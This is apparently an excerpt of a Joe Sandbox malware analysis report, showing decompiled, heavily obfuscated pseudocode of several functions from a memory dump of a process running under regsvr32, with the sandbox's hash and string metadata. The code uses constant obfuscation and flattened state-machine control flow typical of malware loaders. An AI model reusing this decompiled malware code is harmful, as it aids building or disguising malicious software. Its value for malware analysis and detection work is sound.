                                                                                                                				_v1624 = _v1624 / _t322;
                                                                                                                				_v1624 = _v1624 * 0x60;
                                                                                                                				_v1624 = _v1624 ^ 0x00e78cce;
                                                                                                                				_v1632 = 0x9f0dab;
                                                                                                                				_v1632 = _v1632 ^ 0xf8eab3c0;
                                                                                                                				_t304 = _v1632 * 0x3c;
                                                                                                                				_v1632 = _t304;
                                                                                                                				_v1632 = _v1632 ^ 0x3b9f96e2;
                                                                                                                				_v1640 = 0x719f06;
                                                                                                                				_v1640 = _v1640 ^ 0x1254811e;
                                                                                                                				_v1640 = _v1640 >> 0xd;
                                                                                                                				_v1640 = _v1640 ^ 0x0007e723;
                                                                                                                				_v1644 = 0x71343;
                                                                                                                				_v1644 = _v1644 + 0x2e9;
                                                                                                                				_v1644 = _v1644 >> 9;
                                                                                                                				_v1644 = _v1644 ^ 0x000e986a;
                                                                                                                				while(_t353 != 0x864531) {
                                                                                                                					if(_t353 == 0x2b81e36) {
                                                                                                                						_t353 = 0x74f4821;
                                                                                                                						continue;
                                                                                                                					} else {
                                                                                                                						_t361 = _t353 - 0x74f4821;
                                                                                                                						if(_t353 != 0x74f4821) {
                                                                                                                							L8:
                                                                                                                							__eflags = _t353 - 0x6c3f2c3;
                                                                                                                							if(__eflags != 0) {
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							E001C0575(_v1664, _v1584, _t361, _t322,  &_v1560, _v1600);
                                                                                                                							 *((short*)(E001A2263( &_v1560, _v1604, _v1636, _v1612))) = 0;
                                                                                                                							E001B9054(_v1628,  &_v520, _t361, _v1656, _v1568, _v1672);
                                                                                                                							_push(_v1572);
                                                                                                                							_push(0x1a11a8);
                                                                                                                							_push(_v1596);
                                                                                                                							_t258 =  &_v1620; // 0x75426166
                                                                                                                							E001B8EB3( &_v1560, _t361, _v1648, _v1680, _v1588,  &_v1040, _v1580, E001BF5D9(_v1680,  *_t258, _t361), _v1564);
                                                                                                                							E001BF94B(_t310, _v1668, _v1576, _v1676, _v1608);
                                                                                                                							_t322 =  &_v1040;
                                                                                                                							_t304 = E001C05F6( &_v1040, _t352, _v1616, _v1652, _v1660, _v1592);
                                                                                                                							_t356 =  &(_t356[0x19]);
                                                                                                                							if(_t304 != 0) {
                                                                                                                								_t353 = 0x864531;
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					return _t304;
                                                                                                                				}
                                                                                                                				__eflags = 0;
                                                                                                                				_t322 = _v1624;
                                                                                                                				_t304 = E001B4E54(_v1624, 0, 0, 0, 0, _v1632,  &_v1040, _v1640, _v1624, _v1644);
                                                                                                                				_t356 =  &(_t356[7]);
                                                                                                                				_t353 = 0x6c3f2c3;
                                                                                                                				goto L8;
                                                                                                                			}

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: A[$faBu$|8{T$)$
                                                                                                                • API String ID: 0-2976587679
                                                                                                                • Opcode ID: 3311ce99aab6cd131eebbf9dabdcf633d60a79743c4c43e347978b53476d1ce8
                                                                                                                • Instruction ID: 3738499f8303132e59d895f8b7af3de8739636016f93dbdc8f7cb83b8e162dfb
                                                                                                                • Opcode Fuzzy Hash: 3311ce99aab6cd131eebbf9dabdcf633d60a79743c4c43e347978b53476d1ce8
                                                                                                                • Instruction Fuzzy Hash: 23D111725083809FD368CF25C58AA4BFBF1FBC5758F108A1DF2A996260D7B58949CF42
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 96%
                                                                                                                			E001AA9CF() {
                                                                                                                				intOrPtr _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				signed int _v16;
                                                                                                                				char _v20;
                                                                                                                				char _v24;
                                                                                                                				char _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				signed int _v52;
                                                                                                                				signed int _v56;
                                                                                                                				signed int _v60;
                                                                                                                				signed int _v64;
                                                                                                                				signed int _v68;
                                                                                                                				signed int _v72;
                                                                                                                				signed int _v76;
                                                                                                                				signed int _v80;
                                                                                                                				signed int _v84;
                                                                                                                				signed int _v88;
                                                                                                                				signed int _v92;
                                                                                                                				signed int _v96;
                                                                                                                				intOrPtr _t199;
                                                                                                                				signed int _t202;
                                                                                                                				intOrPtr _t206;
                                                                                                                				intOrPtr _t209;
                                                                                                                				void* _t210;
                                                                                                                				signed int _t212;
                                                                                                                				signed int _t213;
                                                                                                                				signed int _t214;
                                                                                                                				signed int _t215;
                                                                                                                				signed int _t216;
                                                                                                                				intOrPtr _t221;
                                                                                                                				void* _t243;
                                                                                                                				char _t247;
                                                                                                                				void* _t248;
                                                                                                                				void* _t250;
                                                                                                                
                                                                                                                				_v72 = 0xb444e2;
                                                                                                                				_t212 = 0x67;
                                                                                                                				_v72 = _v72 / _t212;
                                                                                                                				_v72 = _v72 | 0x87c450fb;
                                                                                                                				_t210 = 0;
                                                                                                                				_v72 = _v72 + 0xffff808c;
                                                                                                                				_t243 = 0x9728066;
                                                                                                                				_v72 = _v72 ^ 0x87c57708;
                                                                                                                				_v56 = 0xa1b977;
                                                                                                                				_t213 = 0x2e;
                                                                                                                				_v56 = _v56 / _t213;
                                                                                                                				_v56 = _v56 + 0xffff53e5;
                                                                                                                				_v56 = _v56 ^ 0x000dc799;
                                                                                                                				_v36 = 0x531716;
                                                                                                                				_v36 = _v36 + 0x222c;
                                                                                                                				_v36 = _v36 ^ 0x0055b68d;
                                                                                                                				_v40 = 0xe49ee6;
                                                                                                                				_t214 = 0x5d;
                                                                                                                				_v40 = _v40 * 0x78;
                                                                                                                				_v40 = _v40 ^ 0x6b26598f;
                                                                                                                				_v76 = 0x9798c2;
                                                                                                                				_v76 = _v76 ^ 0xa2ba9d5b;
                                                                                                                				_v76 = _v76 >> 1;
                                                                                                                				_v76 = _v76 * 0x4d;
                                                                                                                				_v76 = _v76 ^ 0x63c2c166;
                                                                                                                				_v80 = 0x9fbabe;
                                                                                                                				_v80 = _v80 >> 0xb;
                                                                                                                				_v80 = _v80 << 0xb;
                                                                                                                				_v80 = _v80 * 0x6f;
                                                                                                                				_v80 = _v80 ^ 0x4546ef9b;
                                                                                                                				_v84 = 0x66afc1;
                                                                                                                				_v84 = _v84 | 0xddecfcfd;
                                                                                                                				_v84 = _v84 / _t214;
                                                                                                                				_v84 = _v84 ^ 0x026206d6;
                                                                                                                				_v60 = 0xc7aae5;
                                                                                                                				_t215 = 0x2b;
                                                                                                                				_v60 = _v60 / _t215;
                                                                                                                				_v60 = _v60 + 0xffff183d;
                                                                                                                				_v60 = _v60 ^ 0x00004396;
                                                                                                                				_v44 = 0x703f20;
                                                                                                                				_v44 = _v44 >> 5;
                                                                                                                				_v44 = _v44 ^ 0x000f90eb;
                                                                                                                				_v48 = 0x3ae1ef;
                                                                                                                				_v48 = _v48 << 4;
                                                                                                                				_v48 = _v48 ^ 0x03a95a41;
                                                                                                                				_v88 = 0x8f3cbe;
                                                                                                                				_v88 = _v88 | 0x844d8b7c;
                                                                                                                				_v88 = _v88 >> 0xf;
                                                                                                                				_v88 = _v88 << 0xd;
                                                                                                                				_v88 = _v88 ^ 0x2132a262;
                                                                                                                				_v92 = 0x642638;
                                                                                                                				_t95 =  &_v92; // 0x642638
                                                                                                                				_v92 =  *_t95 * 0x50;
                                                                                                                				_v92 = _v92 + 0xffffd80f;
                                                                                                                				_v92 = _v92 << 8;
                                                                                                                				_v92 = _v92 ^ 0x4bc44590;
                                                                                                                				_v52 = 0x2b761f;
                                                                                                                				_v52 = _v52 << 8;
                                                                                                                				_v52 = _v52 ^ 0x2b7a0fc6;
                                                                                                                				_v64 = 0x37f3d;
                                                                                                                				_t216 = 0x55;
                                                                                                                				_v64 = _v64 / _t216;
                                                                                                                				_v64 = _v64 | 0xee4ace4d;
                                                                                                                				_v64 = _v64 ^ 0xee4a59da;
                                                                                                                				_v96 = 0xa0b3bf;
                                                                                                                				_v96 = _v96 ^ 0x84ee222b;
                                                                                                                				_v96 = _v96 << 1;
                                                                                                                				_t217 = 0x14;
                                                                                                                				_v96 = _v96 / _t217;
                                                                                                                				_v96 = _v96 ^ 0x0063a113;
                                                                                                                				_v68 = 0xad56e2;
                                                                                                                				_v68 = _v68 + 0xffffe42a;
                                                                                                                				_v68 = _v68 * 0x21;
                                                                                                                				_v68 = _v68 >> 0xd;
                                                                                                                				_v68 = _v68 ^ 0x000ff2b1;
                                                                                                                				_v32 = 0x44b560;
                                                                                                                				_v32 = _v32 | 0xc129e094;
                                                                                                                				_v32 = _v32 ^ 0xc1602592;
                                                                                                                				_t242 = _v28;
                                                                                                                				_t247 = _v28;
                                                                                                                				goto L1;
                                                                                                                				do {
                                                                                                                					while(1) {
                                                                                                                						L1:
                                                                                                                						_t250 = _t243 - 0x9728066;
                                                                                                                						if(_t250 > 0) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						if(_t250 == 0) {
                                                                                                                							_t243 = 0xb487bad;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						if(_t243 == 0x343dbaf) {
                                                                                                                							_t217 = _v56;
                                                                                                                							_t199 = E001B2657(_v56, _v36,  &_v28, _t247, _v40);
                                                                                                                							_t242 = _t199;
                                                                                                                							_t248 = _t248 + 0xc;
                                                                                                                							if(_t199 == 0) {
                                                                                                                								goto L22;
                                                                                                                							}
                                                                                                                							_t243 = 0xe79433e;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						if(_t243 == 0x39a7551) {
                                                                                                                							_t202 = E001BA683(_v60,  &_v24, _v44,  &_v16);
                                                                                                                							asm("sbb esi, esi");
                                                                                                                							_pop(_t217);
                                                                                                                							_t243 = ( ~_t202 & 0xfe42ae62) + 0x69468b2;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						if(_t243 == 0x4d71714) {
                                                                                                                							_t221 =  *0x1c4c10; // 0x67d820
                                                                                                                							_t157 = _t221 + 0x20c; // 0x75004c
                                                                                                                							E001C0DE9(_t157, _v12, _v48, _v88, _v92, _v8 + 1, _v52);
                                                                                                                							_t206 =  *0x1c4c10; // 0x67d820
                                                                                                                							_t217 = _v16;
                                                                                                                							_t248 = _t248 + 0x14;
                                                                                                                							_t210 = 1;
                                                                                                                							_t243 = 0x69468b2;
                                                                                                                							 *(_t206 + 0x424) = _v16;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						if(_t243 != 0x69468b2) {
                                                                                                                							goto L21;
                                                                                                                						} else {
                                                                                                                							E001B17D2(_v64, _v96, _v24);
                                                                                                                							_pop(_t217);
                                                                                                                							_t243 = 0x986f6e2;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					if(_t243 == 0x986f6e2) {
                                                                                                                						E001A7C7A(_v68, _t242, _v32);
                                                                                                                						_pop(_t217);
                                                                                                                						_t243 = 0xb70149b;
                                                                                                                						goto L21;
                                                                                                                					}
                                                                                                                					if(_t243 == 0xb487bad) {
                                                                                                                						_t247 = E001B3E11(_t217);
                                                                                                                						_t243 = 0x343dbaf;
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					if(_t243 != 0xe79433e) {
                                                                                                                						goto L21;
                                                                                                                					}
                                                                                                                					_t243 = 0x986f6e2;
                                                                                                                					if(_v28 > 2) {
                                                                                                                						_t217 = _v76;
                                                                                                                						_t209 = E001A22F7(_v76, _v80,  *((intOrPtr*)(_t242 + 8)), _v84,  &_v20);
                                                                                                                						_t248 = _t248 + 0xc;
                                                                                                                						_v24 = _t209;
                                                                                                                						if(_t209 != 0) {
                                                                                                                							_t243 = 0x39a7551;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					goto L1;
                                                                                                                					L21:
                                                                                                                				} while (_t243 != 0xb70149b);
                                                                                                                				L22:
                                                                                                                				return _t210;
                                                                                                                			}









































                                                                                                                0x00000000
                                                                                                                0x001aacda
                                                                                                                0x001aac45
                                                                                                                0x001aac82
                                                                                                                0x001aac8c
                                                                                                                0x001aac92
                                                                                                                0x001aac97
                                                                                                                0x001aac9e
                                                                                                                0x001aaca2
                                                                                                                0x001aaca5
                                                                                                                0x001aaca6
                                                                                                                0x001aacab
                                                                                                                0x00000000
                                                                                                                0x001aacab
                                                                                                                0x001aac4d
                                                                                                                0x00000000
                                                                                                                0x001aac53
                                                                                                                0x001aac5f
                                                                                                                0x001aac64
                                                                                                                0x001aac65
                                                                                                                0x00000000
                                                                                                                0x001aac65
                                                                                                                0x001aac4d
                                                                                                                0x001aad23
                                                                                                                0x001aad96
                                                                                                                0x001aad9b
                                                                                                                0x001aad9c
                                                                                                                0x00000000
                                                                                                                0x001aad9c
                                                                                                                0x001aad2b
                                                                                                                0x001aad80
                                                                                                                0x001aad82
                                                                                                                0x00000000
                                                                                                                0x001aad82
                                                                                                                0x001aad33
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001aad3a
                                                                                                                0x001aad3f
                                                                                                                0x001aad55
                                                                                                                0x001aad59
                                                                                                                0x001aad5e
                                                                                                                0x001aad61
                                                                                                                0x001aad67
                                                                                                                0x001aad6d
                                                                                                                0x001aad6d
                                                                                                                0x001aad67
                                                                                                                0x00000000
                                                                                                                0x001aada1
                                                                                                                0x001aada1
                                                                                                                0x001aadb0
                                                                                                                0x001aadb6

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ?p$,"$8&d$:
                                                                                                                • API String ID: 0-3128282930
                                                                                                                • Opcode ID: 4b8bb3c63d40efda018924496be4d3e7b5e8b26b2aa730cab0ecaa13329d48e9
                                                                                                                • Instruction ID: 2ebfb77d0acdd5abf7b9865f20f592f3d6af1bbf3069b867873d640915b0fccc
                                                                                                                • Opcode Fuzzy Hash: 4b8bb3c63d40efda018924496be4d3e7b5e8b26b2aa730cab0ecaa13329d48e9
                                                                                                                • Instruction Fuzzy Hash: E6A152329083409FC318CF64D48981BFBE1BBC5768F50492EF99A96220D3B6D949CB83
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 97%
                                                                                                                			E001A1A5F(void* __ecx, void* __edx) {
                                                                                                                				signed int _v4;
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				signed int _v52;
                                                                                                                				signed int _v56;
                                                                                                                				signed int _v60;
                                                                                                                				signed int _v64;
                                                                                                                				signed int _v68;
                                                                                                                				signed int _v72;
                                                                                                                				signed int _v76;
                                                                                                                				void* _t168;
                                                                                                                				intOrPtr _t169;
                                                                                                                				intOrPtr _t173;
                                                                                                                				void* _t174;
                                                                                                                				signed int _t176;
                                                                                                                				void* _t192;
                                                                                                                				void* _t193;
                                                                                                                				signed int* _t196;
                                                                                                                				signed int* _t197;
                                                                                                                
                                                                                                                				_t196 =  &_v76;
                                                                                                                				_v24 = 0xc0bffa;
                                                                                                                				_v24 = _v24 * 0x6b;
                                                                                                                				_t192 = __edx;
                                                                                                                				_v24 = _v24 ^ 0x5090a1dc;
                                                                                                                				_v52 = 0x12341a;
                                                                                                                				_t174 = __ecx;
                                                                                                                				_v52 = _v52 | 0xd6995a37;
                                                                                                                				_t193 = 0x6ac6f9c;
                                                                                                                				_v52 = _v52 + 0xffffd59f;
                                                                                                                				_v52 = _v52 ^ 0xd698e1d8;
                                                                                                                				_v28 = 0xd78d99;
                                                                                                                				_v28 = _v28 | 0xd5b816ad;
                                                                                                                				_v28 = _v28 ^ 0xd5f1ead7;
                                                                                                                				_v32 = 0x4c8107;
                                                                                                                				_t176 = 0x4d;
                                                                                                                				_v32 = _v32 * 0x49;
                                                                                                                				_v32 = _v32 ^ 0x15dd2280;
                                                                                                                				_v48 = 0xe3ce4e;
                                                                                                                				_v48 = _v48 ^ 0x2cd09c59;
                                                                                                                				_v48 = _v48 << 1;
                                                                                                                				_v48 = _v48 ^ 0x5862d5b8;
                                                                                                                				_v20 = 0xbf1f42;
                                                                                                                				_v20 = _v20 << 0xe;
                                                                                                                				_v20 = _v20 ^ 0xc7dae4f1;
                                                                                                                				_v64 = 0x587d15;
                                                                                                                				_v64 = _v64 + 0x45c5;
                                                                                                                				_v64 = _v64 | 0x045a514e;
                                                                                                                				_v64 = _v64 + 0x1125;
                                                                                                                				_v64 = _v64 ^ 0x04502ba8;
                                                                                                                				_v16 = 0x4b70a;
                                                                                                                				_v16 = _v16 * 0x57;
                                                                                                                				_v16 = _v16 ^ 0x019ef5b9;
                                                                                                                				_v44 = 0x31a52e;
                                                                                                                				_v44 = _v44 + 0xffff693c;
                                                                                                                				_v44 = _v44 / _t176;
                                                                                                                				_v44 = _v44 ^ 0x000e7025;
                                                                                                                				_v36 = 0xe858;
                                                                                                                				_v36 = _v36 ^ 0x8be47117;
                                                                                                                				_v36 = _v36 ^ 0x8bef38db;
                                                                                                                				_v68 = 0xae7668;
                                                                                                                				_v68 = _v68 + 0x1d8d;
                                                                                                                				_v68 = _v68 >> 1;
                                                                                                                				_t177 = 0x63;
                                                                                                                				_v68 = _v68 * 0x4a;
                                                                                                                				_v68 = _v68 ^ 0x1933910c;
                                                                                                                				_v72 = 0x1e14fa;
                                                                                                                				_v72 = _v72 << 1;
                                                                                                                				_v72 = _v72 >> 0xe;
                                                                                                                				_v72 = _v72 | 0x07c13180;
                                                                                                                				_v72 = _v72 ^ 0x07c3a224;
                                                                                                                				_v76 = 0xcd8842;
                                                                                                                				_v76 = _v76 * 0x31;
                                                                                                                				_v76 = _v76 | 0xd2f5f7fa;
                                                                                                                				_v76 = _v76 ^ 0xf7f93cba;
                                                                                                                				_v60 = 0x492c49;
                                                                                                                				_v60 = _v60 + 0xffffce5e;
                                                                                                                				_v60 = _v60 ^ 0x8bbf0f33;
                                                                                                                				_v60 = _v60 + 0x943a;
                                                                                                                				_v60 = _v60 ^ 0x8bf931c1;
                                                                                                                				_v8 = 0xeced47;
                                                                                                                				_t100 =  &_v8; // 0xeced47
                                                                                                                				_v8 =  *_t100 / _t177;
                                                                                                                				_v8 = _v8 ^ 0x0009a769;
                                                                                                                				_v40 = 0x85a946;
                                                                                                                				_v40 = _v40 ^ 0xe669efc2;
                                                                                                                				_v40 = _v40 ^ 0x2fecdf48;
                                                                                                                				_v40 = _v40 ^ 0xc90240a9;
                                                                                                                				_v12 = 0x3b7c7e;
                                                                                                                				_v12 = _v12 ^ 0xb84d48c3;
                                                                                                                				_v12 = _v12 ^ 0xb87207eb;
                                                                                                                				_v56 = 0xadac2a;
                                                                                                                				_v56 = _v56 << 1;
                                                                                                                				_v56 = _v56 + 0xffff35ec;
                                                                                                                				_v56 = _v56 + 0x82ef;
                                                                                                                				_v56 = _v56 ^ 0x0153125b;
                                                                                                                				_v4 = 0xb1ab26;
                                                                                                                				_v4 = _v4 ^ 0x53794212;
                                                                                                                				_v4 = _v4 ^ 0x53c9d93c;
                                                                                                                				while(1) {
                                                                                                                					L1:
                                                                                                                					_t168 = 0x2905f39;
                                                                                                                					do {
                                                                                                                						while(_t193 != _t168) {
                                                                                                                							if(_t193 == 0x6ac6f9c) {
                                                                                                                								_t193 = 0x6fd6f86;
                                                                                                                								continue;
                                                                                                                							} else {
                                                                                                                								if(_t193 == 0x6fd6f86) {
                                                                                                                									_push(_v32);
                                                                                                                									_t169 = E001B3E89(_v24, _v52, __eflags, _v28, _t177, _t174);
                                                                                                                									_t197 =  &(_t196[4]);
                                                                                                                									 *((intOrPtr*)(_t192 + 0x14)) = _t169;
                                                                                                                									__eflags = _t169;
                                                                                                                									if(_t169 != 0) {
                                                                                                                										E001B9954(_t169, _t169, _v48, _v20);
                                                                                                                										_push( *((intOrPtr*)(_t192 + 0x14)));
                                                                                                                										_push(_v44);
                                                                                                                										_t177 = _v64;
                                                                                                                										E001A7013(_v64, _v16);
                                                                                                                										_t196 =  &(_t197[4]);
                                                                                                                										_t193 = 0xe0809d9;
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                								} else {
                                                                                                                									if(_t193 == 0xabeb3a7) {
                                                                                                                										return E001C1BE6(_v56,  *((intOrPtr*)(_t192 + 0x14)), _v4);
                                                                                                                									}
                                                                                                                									if(_t193 != 0xe0809d9) {
                                                                                                                										goto L13;
                                                                                                                									} else {
                                                                                                                										_t177 = _v36;
                                                                                                                										_t173 = E001B6028(_v36, _v68, _v72, _v76,  *((intOrPtr*)(_t192 + 0x14)));
                                                                                                                										_t196 =  &(_t196[3]);
                                                                                                                										 *((intOrPtr*)(_t192 + 0xc)) = _t173;
                                                                                                                										_t168 = 0x2905f39;
                                                                                                                										_t193 =  !=  ? 0x2905f39 : 0xabeb3a7;
                                                                                                                										continue;
                                                                                                                									}
                                                                                                                									L17:
                                                                                                                								}
                                                                                                                							}
                                                                                                                							L16:
                                                                                                                							return _t169;
                                                                                                                							goto L17;
                                                                                                                						}
                                                                                                                						_t169 = E001B0231(_t192, _v60, _t192, E001BF7F4, _t192, _t177, _v8, _v40, _v12);
                                                                                                                						_t196 =  &(_t196[8]);
                                                                                                                						 *((intOrPtr*)(_t192 + 4)) = _t169;
                                                                                                                						__eflags = _t169;
                                                                                                                						if(_t169 == 0) {
                                                                                                                							_t193 = 0xabeb3a7;
                                                                                                                							_t168 = 0x2905f39;
                                                                                                                							goto L13;
                                                                                                                						}
                                                                                                                						goto L16;
                                                                                                                						L13:
                                                                                                                						__eflags = _t193 - 0x5387d9c;
                                                                                                                					} while (__eflags != 0);
                                                                                                                					return _t168;
                                                                                                                				}
                                                                                                                			}


                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: G$I,I$X$~|;
                                                                                                                • API String ID: 0-2912738583
                                                                                                                • Opcode ID: cdc6cf6c770e798eeb27077ed1ff4c87a8a128bf93f5d5242897ff0df5aa2e14
                                                                                                                • Instruction ID: 61b8997097ce60b50fa16ea28c21642e8569f1e89821d937e237995a996313b8
                                                                                                                • Opcode Fuzzy Hash: cdc6cf6c770e798eeb27077ed1ff4c87a8a128bf93f5d5242897ff0df5aa2e14
                                                                                                                • Instruction Fuzzy Hash: C18130B5509381AFC398CF64C58A81BFBF1FB84718F405A1DF596A6260D3B5DA088B87
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 93%
                                                                                                                			E001B7E3D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				char _v4;
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				signed int _v52;
                                                                                                                				signed int _v56;
                                                                                                                				signed int _v60;
                                                                                                                				signed int _v64;
                                                                                                                				signed int _v68;
                                                                                                                				void* _t152;
                                                                                                                				void* _t165;
                                                                                                                				signed int _t176;
                                                                                                                				signed int _t177;
                                                                                                                				signed int _t178;
                                                                                                                				signed int _t179;
                                                                                                                				void* _t182;
                                                                                                                				void* _t198;
                                                                                                                				void* _t199;
                                                                                                                				signed int* _t202;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t198 = __ecx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E001AC98A(_t152);
                                                                                                                				_v16 = 0x6cdeb9;
                                                                                                                				_t202 =  &(( &_v68)[4]);
                                                                                                                				_t199 = 0;
                                                                                                                				_t182 = 0x673029;
                                                                                                                				_t176 = 0x42;
                                                                                                                				_v16 = _v16 / _t176;
                                                                                                                				_v16 = _v16 ^ 0x0001a649;
                                                                                                                				_v28 = 0x421dd1;
                                                                                                                				_v28 = _v28 ^ 0x91db12c0;
                                                                                                                				_v28 = _v28 << 4;
                                                                                                                				_v28 = _v28 ^ 0x1990f111;
                                                                                                                				_v20 = 0x91374a;
                                                                                                                				_v20 = _v20 >> 0xc;
                                                                                                                				_v20 = _v20 ^ 0x40000913;
                                                                                                                				_v8 = 0xece2fd;
                                                                                                                				_t177 = 7;
                                                                                                                				_v8 = _v8 / _t177;
                                                                                                                				_v8 = _v8 ^ 0x4021d748;
                                                                                                                				_v40 = 0xafe691;
                                                                                                                				_v40 = _v40 ^ 0xefea2fdb;
                                                                                                                				_t178 = 0x1c;
                                                                                                                				_v40 = _v40 * 0x6b;
                                                                                                                				_v40 = _v40 ^ 0x0227a533;
                                                                                                                				_v56 = 0xd7a6d;
                                                                                                                				_t41 =  &_v56; // 0xd7a6d
                                                                                                                				_v56 =  *_t41 / _t178;
                                                                                                                				_v56 = _v56 + 0xffffe474;
                                                                                                                				_v56 = _v56 + 0xffffe36a;
                                                                                                                				_v56 = _v56 ^ 0x000f7b37;
                                                                                                                				_v60 = 0x6ca6b;
                                                                                                                				_v60 = _v60 + 0xffffdae7;
                                                                                                                				_v60 = _v60 >> 7;
                                                                                                                				_v60 = _v60 | 0xcbac781c;
                                                                                                                				_v60 = _v60 ^ 0xcbae522f;
                                                                                                                				_v44 = 0xdf19a5;
                                                                                                                				_v44 = _v44 ^ 0xb14a7ac9;
                                                                                                                				_v44 = _v44 + 0x9cdb;
                                                                                                                				_v44 = _v44 ^ 0xb1911e62;
                                                                                                                				_v48 = 0x58507;
                                                                                                                				_v48 = _v48 ^ 0x09def95a;
                                                                                                                				_v48 = _v48 + 0x57a6;
                                                                                                                				_v48 = _v48 ^ 0x09d0f7b8;
                                                                                                                				_v64 = 0x485ca9;
                                                                                                                				_t179 = 0x44;
                                                                                                                				_v64 = _v64 / _t179;
                                                                                                                				_v64 = _v64 | 0x128d571e;
                                                                                                                				_v64 = _v64 << 0xb;
                                                                                                                				_v64 = _v64 ^ 0x6ab49c87;
                                                                                                                				_v68 = 0xe5c221;
                                                                                                                				_v68 = _v68 * 0x7f;
                                                                                                                				_v68 = _v68 | 0xaf53039f;
                                                                                                                				_v68 = _v68 + 0xe94;
                                                                                                                				_v68 = _v68 ^ 0xfffbef17;
                                                                                                                				_v24 = 0x80217;
                                                                                                                				_v24 = _v24 | 0xbc5c9305;
                                                                                                                				_v24 = _v24 ^ 0xbc535d95;
                                                                                                                				_v52 = 0xd8af84;
                                                                                                                				_v52 = _v52 + 0xa9a8;
                                                                                                                				_v52 = _v52 >> 0xd;
                                                                                                                				_v52 = _v52 >> 3;
                                                                                                                				_v52 = _v52 ^ 0x000e2b59;
                                                                                                                				_v32 = 0xa8ee69;
                                                                                                                				_v32 = _v32 ^ 0x21bd0d74;
                                                                                                                				_v32 = _v32 + 0xffff9bde;
                                                                                                                				_v32 = _v32 ^ 0x211b91de;
                                                                                                                				_v36 = 0x68443b;
                                                                                                                				_v36 = _v36 << 9;
                                                                                                                				_v36 = _v36 | 0xed698887;
                                                                                                                				_v36 = _v36 ^ 0xfdea73c9;
                                                                                                                				_v12 = 0x1b5d09;
                                                                                                                				_v12 = _v12 + 0xffff6a6f;
                                                                                                                				_v12 = _v12 ^ 0x0019da53;
                                                                                                                				while(_t182 != 0x673029) {
                                                                                                                					if(_t182 == 0x6329fa7) {
                                                                                                                						_t165 = E001C1CE8(_v40, _v20 | _v16, _t198, 0, _v56, _v60, _v44,  &_v4, _a4);
                                                                                                                						_t202 =  &(_t202[7]);
                                                                                                                						if(_t165 != 0) {
                                                                                                                							_t182 = 0xa16e963;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						if(_t182 == 0x635b1bc) {
                                                                                                                							E001C1CE8(_v52, _v8 | _v28, _t198, _t199, _v32, _v36, _v12,  &_v4, _a4);
                                                                                                                						} else {
                                                                                                                							if(_t182 != 0xa16e963) {
                                                                                                                								L10:
